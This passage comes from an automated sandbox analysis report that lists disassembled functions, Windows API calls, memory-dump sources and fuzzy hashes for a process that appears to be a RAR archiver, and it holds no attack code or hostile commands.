EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF61860BB79), ref: 00007FF61860BBB9
SetEvent.KERNEL32 ref: 00007FF61860BBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF61860BBD8

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: 821ddeda32652c645420057810c8c934b74bbb58e4ddb0586e3273b4567bde0b
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 7EF06D22A0CE4683EB60DF31F5400BD6361FB89FB8F044230DE9D86669DF2CD9499B48

Function 00007FF6185D7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B4A
GetFileType.KERNELBASE(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B56
GetConsoleMode.KERNEL32(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B69

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: b05e8480350d777afffaf6a09721af94d762e680ac387e024d8b7357f10ed630
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: ACE0C220F04E0353FF988732A8651782251DF4DFA0F401074DC0FCA350EE2CD8898304

Function 00007FF618622488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF61862246C), ref: 00007FF6186224B0
TerminateProcess.KERNEL32(?,?,?,00007FF61862246C), ref: 00007FF6186224BB
ExitProcess.KERNEL32 ref: 00007FF6186224CA

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: 554302ff8ad13548851b3b19046246969d71d18a0e34a17f444785d99de8b683
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: C2E09A24A08B5682EB54AB75998537933536F94F61F005478CC0E863D3CE3DA84D9395

Function 00007FF6185E4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF6185E4255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF6185C6CD9), ref: 00007FF6185E447C

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
Instruction ID: b4cb553207a467db47bca10d3b56c8d2406ca753feb0a2e8463fbfce88fa4b05
Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
Instruction Fuzzy Hash: E9E1B622E18E8285EBA09F76D8801BDABA1FB51BB4F444131DB9D87AD9DF7CD481C704

Function 00007FF6185E1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6185D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6185D7C48), ref: 00007FF6185E1B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6185D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF6185D7C48), ref: 00007FF6185E1BD7

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: 98731b696ffd6b1b356af3d2312b7f60fa074ae077d6112c97084fc2fff47495
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: 9B312663A18E4546F7B09F31E8453A976A4EB90F79F104334DEAC866C5DF7CC4858748

Function 00007FF6185F915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF6185F91CA
new.LIBCMT ref: 00007FF6185F91F2

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d81105a7b79cf5a8c0f7f899289e5f2ec23f4c2bbe66ca8a7c619892d1622942
Instruction ID: 50c861f81de265e2642a9786f9c0eb11cdafa4ed5481aa9d198344bf4ed31223
Opcode Fuzzy Hash: d81105a7b79cf5a8c0f7f899289e5f2ec23f4c2bbe66ca8a7c619892d1622942
Instruction Fuzzy Hash: C3118131909F8181EB40AB75E9403A9A2E4EF94BE0F144638EA9D877E6DE38D151C358

Function 00007FF6185E20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF6185E22EE), ref: 00007FF6185E211B
GetLastError.KERNEL32(?,?,?,00007FF6185E22EE), ref: 00007FF6185E2126

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: 4e796e6b0170dc8af2bd218f34032632593aaee73ddc5e595186ea37104a1a03
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: 0601A521E19E9282EBA88B37A900569A361EF54FF0F145630EE6D83BD8CF3CE5418705

Function 00007FF6185D7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF6185D7A7B

Part of subcall function 00007FF618622AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF618627EF3

setbuf.LIBCMT ref: 00007FF6185D7A8F

Part of subcall function 00007FF6185D7B44: GetStdHandle.KERNEL32(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B4A
Part of subcall function 00007FF6185D7B44: GetFileType.KERNELBASE(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B56
Part of subcall function 00007FF6185D7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6185D7A9E), ref: 00007FF6185D7B69

Part of subcall function 00007FF618622ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF618622AD0

Part of subcall function 00007FF618622B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF618622C1C

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
Instruction ID: ed17206fd356379bd4d188c9fdb0d9cee7e13773f57d9bb2151a8042a7119c95
Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
Instruction Fuzzy Hash: 8A010800E0D98206FB58B37554A23B9A6838F91B34F5082B8E91DCB7E7DD2C6406E39D

Function 00007FF6185E2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF6185E2480
GetLastError.KERNEL32 ref: 00007FF6185E248D

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: a9514470824a0ad0b2fc0e4b3634d647a559e7e7c470b4a08382c72a8f3084a7
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: AD01A131A08F8282EBA4AB3AE8402786360EB40FB8F144331E53D855E9CF3CD986C744

Function 00007FF6185E30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF6185E305D,?,?,?,?,?,?,?,?,00007FF6185F4126,?,?,?,?,00000800), ref: 00007FF6185E30F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6185F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6185E3119

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: 9e9987b8bbdb735ee4170d678c62ab4a81b2a8e0d3d0eeb7400cc1566a59a2f3
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: 1FF0A421B18A8142EBA0DB75F8543BD62A0FB8CBF4F400130E99CC3796CE6CD5845744

Function 00007FF61860B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF618607F72), ref: 00007FF61860B41E
LoadLibraryExW.KERNELBASE ref: 00007FF61860B449

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: 3229bfef368efe01438b3810ae78f091a80f9d782e795543540a243e0415aba6
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: 58F06821B1898182F7709B30E8553F96264FF98B94F804031E9CDC6659DE2CD6449694

Function 00007FF61860BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61860BACD), ref: 00007FF61860BA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF61860BA87

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: ac8eae27e10009e5530b9a9fc9fe1ed425de066123d4cf8ff22bcde20e5e5a86
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: 74E02B20B3895143DBD88B29C491FA92390EF44F80F806035F80FC3A14DD1DC4488B44

Function 00007FF618624A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF618624A8A
GetLastError.KERNEL32 ref: 00007FF618624A9C

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: 00da18781a35b1aa700f8871e872e8ba606266f76d73cdb6782d80ca91543c91
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction Fuzzy Hash: 5CE08660E19D4342FF08A7F2644517432A26F84F64F044070DD0DC6252EE2C688553CD

Function 00007FF6186071FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
